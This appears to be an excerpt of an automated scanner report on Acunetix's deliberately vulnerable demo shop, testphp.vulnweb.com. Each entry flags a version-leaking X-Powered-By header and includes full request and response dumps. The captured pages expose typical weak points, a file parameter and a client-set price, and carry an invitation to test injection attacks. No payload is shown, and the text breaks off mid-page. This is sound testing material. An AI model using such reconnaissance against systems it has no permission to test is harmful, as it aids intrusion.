Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:16:50 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 16 |
Response Body - size: 16 bytes. |
File not found.
|
URL | http://testphp.vulnweb.com/product.php?pic=1 |
Method | GET |
Parameter | |
Attack | |
Evidence | X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 |
Request Header - size: 291 bytes. |
GET http://testphp.vulnweb.com/product.php?pic=1 HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/listproducts.php?cat=1 |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:17:06 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 6428 |
Response Body - size: 6,428 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>picture details</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <script language="javascript1.2"> <!-- function popUpWindow(URLStr, left, top, width, height) { window.open(URLStr, 'popUpWin', 'toolbar=no,location=no,directories=no,status=no,menub ar=no,scrollbar=no,resizable=no,copyhistory=yes,width='+width+',height='+height+',left='+left+', top='+top+',screenX='+left+',screenY='+top+''); } --> </script> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> <h2 id='pageName'>The shore</h2><div class='story'><p><a href='showimage.php?file=./pictures/1.jpg' target='_blank'><img style='cursor:pointer' border='0' align='center' src='showimage.php?file=./pictures/1.jpg&size=160' width='160' height='100'></a><h3>Short description</h3><p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie. Sed aliquam sem ut arcu.</p><h3>Long description</h3><p><p> This picture is an 53 cm x 12 cm masterpiece. </p> <p> This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information.This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information.This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information.This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information. </p></p><p>painted by: <a href='artists.php?artist=1'>r4w8173</a></p><p>the price of this item is: $500</p></div><div class='story'><form name='f_addcart' method='POST' action='cart.php'><input type='hidden' name='price' value='500'><input type='hidden' name='addcart' value='1'><input type='submit' value='add this picture to cart'></form></div></div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/product.php?pic=2 |
Method | GET |
Parameter | |
Attack | |
Evidence | X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 |
Request Header - size: 291 bytes. |
GET http://testphp.vulnweb.com/product.php?pic=2 HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/listproducts.php?cat=1 |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:17:07 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 6368 |
Response Body - size: 6,368 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>picture details</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <script language="javascript1.2"> <!-- function popUpWindow(URLStr, left, top, width, height) { window.open(URLStr, 'popUpWin', 'toolbar=no,location=no,directories=no,status=no,menub ar=no,scrollbar=no,resizable=no,copyhistory=yes,width='+width+',height='+height+',left='+left+', top='+top+',screenX='+left+',screenY='+top+''); } --> </script> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> <h2 id='pageName'>Mistery</h2><div class='story'><p><a href='showimage.php?file=./pictures/2.jpg' target='_blank'><img style='cursor:pointer' border='0' align='center' src='showimage.php?file=./pictures/2.jpg&size=160' width='160' height='100'></a><h3>Short description</h3><p>Donec molestie. Sed aliquam sem ut arcu.</p><h3>Long description</h3><p><p> This picture is an 53 cm x 12 cm masterpiece. </p> <p> This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information.This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information.This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information.This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information. </p></p><p>painted by: <a href='artists.php?artist=1'>r4w8173</a></p><p>the price of this item is: $800</p></div><div class='story'><form name='f_addcart' method='POST' action='cart.php'><input type='hidden' name='price' value='800'><input type='hidden' name='addcart' value='2'><input type='submit' value='add this picture to cart'></form></div></div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/product.php?pic=3 |
Method | GET |
Parameter | |
Attack | |
Evidence | X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 |
Request Header - size: 291 bytes. |
GET http://testphp.vulnweb.com/product.php?pic=3 HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/listproducts.php?cat=1 |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:17:08 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 6401 |
Response Body - size: 6,401 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>picture details</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <script language="javascript1.2"> <!-- function popUpWindow(URLStr, left, top, width, height) { window.open(URLStr, 'popUpWin', 'toolbar=no,location=no,directories=no,status=no,menub ar=no,scrollbar=no,resizable=no,copyhistory=yes,width='+width+',height='+height+',left='+left+', top='+top+',screenX='+left+',screenY='+top+''); } --> </script> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> <h2 id='pageName'>The universe</h2><div class='story'><p><a href='showimage.php?file=./pictures/3.jpg' target='_blank'><img style='cursor:pointer' border='0' align='center' src='showimage.php?file=./pictures/3.jpg&size=160' width='160' height='100'></a><h3>Short description</h3><p>Lorem ipsum dolor sit amet. Donec molestie. Sed aliquam sem ut arcu.</p><h3>Long description</h3><p><p> This picture is an 53 cm x 12 cm masterpiece. </p> <p> This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information.This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information.This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information.This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information. </p></p><p>painted by: <a href='artists.php?artist=1'>r4w8173</a></p><p>the price of this item is: $986</p></div><div class='story'><form name='f_addcart' method='POST' action='cart.php'><input type='hidden' name='price' value='986'><input type='hidden' name='addcart' value='3'><input type='submit' value='add this picture to cart'></form></div></div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/product.php?pic=4 |
Method | GET |
Parameter | |
Attack | |
Evidence | X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 |
Request Header - size: 291 bytes. |
GET http://testphp.vulnweb.com/product.php?pic=4 HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/listproducts.php?cat=1 |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:17:09 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 6453 |
Response Body - size: 6,453 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>picture details</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <script language="javascript1.2"> <!-- function popUpWindow(URLStr, left, top, width, height) { window.open(URLStr, 'popUpWin', 'toolbar=no,location=no,directories=no,status=no,menub ar=no,scrollbar=no,resizable=no,copyhistory=yes,width='+width+',height='+height+',left='+left+', top='+top+',screenX='+left+',screenY='+top+''); } --> </script> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> <h2 id='pageName'>Walking</h2><div class='story'><p><a href='showimage.php?file=./pictures/4.jpg' target='_blank'><img style='cursor:pointer' border='0' align='center' src='showimage.php?file=./pictures/4.jpg&size=160' width='160' height='100'></a><h3>Short description</h3><p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie. Sed aliquam sem ut arcu. Phasellus sollicitudin. </p><h3>Long description</h3><p><p> This picture is an 53 cm x 12 cm masterpiece. </p> <p> This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information.This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information.This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information.This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information. </p></p><p>painted by: <a href='artists.php?artist=1'>r4w8173</a></p><p>the price of this item is: $1000</p></div><div class='story'><form name='f_addcart' method='POST' action='cart.php'><input type='hidden' name='price' value='1000'><input type='hidden' name='addcart' value='4'><input type='submit' value='add this picture to cart'></form></div></div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/product.php?pic=5 |
Method | GET |
Parameter | |
Attack | |
Evidence | X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 |
Request Header - size: 291 bytes. |
GET http://testphp.vulnweb.com/product.php?pic=5 HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/listproducts.php?cat=1 |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:17:10 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 6382 |
Response Body - size: 6,382 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>picture details</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <script language="javascript1.2"> <!-- function popUpWindow(URLStr, left, top, width, height) { window.open(URLStr, 'popUpWin', 'toolbar=no,location=no,directories=no,status=no,menub ar=no,scrollbar=no,resizable=no,copyhistory=yes,width='+width+',height='+height+',left='+left+', top='+top+',screenX='+left+',screenY='+top+''); } --> </script> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> <h2 id='pageName'>Mean</h2><div class='story'><p><a href='showimage.php?file=./pictures/5.jpg' target='_blank'><img style='cursor:pointer' border='0' align='center' src='showimage.php?file=./pictures/5.jpg&size=160' width='160' height='100'></a><h3>Short description</h3><p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit.</p><h3>Long description</h3><p><p> This picture is an 53 cm x 12 cm masterpiece. </p> <p> This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information.This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information.This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information.This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information. </p></p><p>painted by: <a href='artists.php?artist=1'>r4w8173</a></p><p>the price of this item is: $460</p></div><div class='story'><form name='f_addcart' method='POST' action='cart.php'><input type='hidden' name='price' value='460'><input type='hidden' name='addcart' value='5'><input type='submit' value='add this picture to cart'></form></div></div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a 